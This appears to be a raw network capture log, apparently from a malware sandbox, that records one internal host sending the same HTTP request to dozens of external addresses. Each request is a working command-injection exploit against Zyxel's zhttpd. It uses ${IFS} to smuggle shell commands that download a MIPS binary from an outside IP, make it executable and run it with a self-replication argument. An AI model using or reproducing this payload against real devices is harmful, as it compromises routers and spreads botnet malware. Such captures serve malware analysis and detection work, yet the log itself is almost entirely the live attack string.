                                                Jan 28, 2024 10:16:13.633296013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1367192.168.2.2358926176.52.179.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633323908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1368192.168.2.2354042139.18.28.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633323908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1369192.168.2.2359126144.192.53.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633383036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1370192.168.2.2354884147.84.217.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633387089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1371192.168.2.234978077.157.38.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633429050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1372192.168.2.2340524150.40.85.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633436918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1373192.168.2.2335110216.226.72.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633481979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1374192.168.2.2356202113.137.182.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633492947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1375192.168.2.2335502161.238.34.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633516073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1376192.168.2.2340584131.42.47.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633550882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1377192.168.2.233538297.195.162.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633595943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1378192.168.2.2350984137.112.120.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633610010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1379192.168.2.234887896.132.11.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633645058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1380192.168.2.2339298156.0.120.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633661985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1381192.168.2.233761843.193.235.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633686066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1382192.168.2.2343800206.119.132.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633718014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1383192.168.2.2357576201.206.199.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633765936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1384192.168.2.2351332153.137.84.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633795977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1385192.168.2.2335668116.239.76.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633800983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1386192.168.2.23500101.250.255.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633825064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1387192.168.2.233729879.144.66.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633850098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1388192.168.2.2334236131.40.23.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633852005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1389192.168.2.2343834202.152.59.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633900881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1390192.168.2.2359696124.142.171.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633929014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1391192.168.2.2349328150.179.182.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633951902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1392192.168.2.234837069.164.145.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633979082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1393192.168.2.2360612160.99.193.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633992910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1394192.168.2.233994878.53.191.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.633996010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1395192.168.2.2339634217.22.234.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634025097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1396192.168.2.2350208137.63.139.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634068012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1397192.168.2.2354632220.155.21.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634094000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1398192.168.2.2347124189.132.56.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634131908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1399192.168.2.235935053.139.46.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634147882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1400192.168.2.2347498188.233.13.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634188890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1401192.168.2.2352476139.233.60.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634210110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1402192.168.2.234640817.156.253.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634242058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1403192.168.2.2336032119.197.73.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634252071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1404192.168.2.2360190108.61.216.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634305954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1405192.168.2.2343642145.44.204.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634320974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1406192.168.2.235959287.243.59.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634346008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1407192.168.2.2341096162.158.110.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634397984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1408192.168.2.2349526143.208.212.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634418964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1409192.168.2.2358922113.157.231.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634438992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1410192.168.2.2356068212.237.24.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634469986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1411192.168.2.2350192128.1.26.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634478092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1412192.168.2.2357180134.146.22.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634517908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1413192.168.2.2334202189.239.181.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634572029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1414192.168.2.23375248.130.170.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634603024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1415192.168.2.2358694152.116.228.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634618044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1416192.168.2.2358800161.73.54.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634637117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1417192.168.2.2344334200.83.155.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634650946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1418192.168.2.2333268193.150.201.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634676933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1419192.168.2.23411889.250.217.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634696007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1420192.168.2.233558649.208.157.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634742975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1421192.168.2.234271881.235.66.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634742975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1422192.168.2.2341856125.223.251.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634779930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1423192.168.2.2356890204.93.9.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634783983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1424192.168.2.23349465.248.237.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634809017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1425192.168.2.23446169.74.38.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634860992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1426192.168.2.2335518160.191.13.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634867907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1427192.168.2.2335360125.17.30.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634900093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1428192.168.2.235420678.82.76.95443
                                                TimestampBytes transferredDirectionData
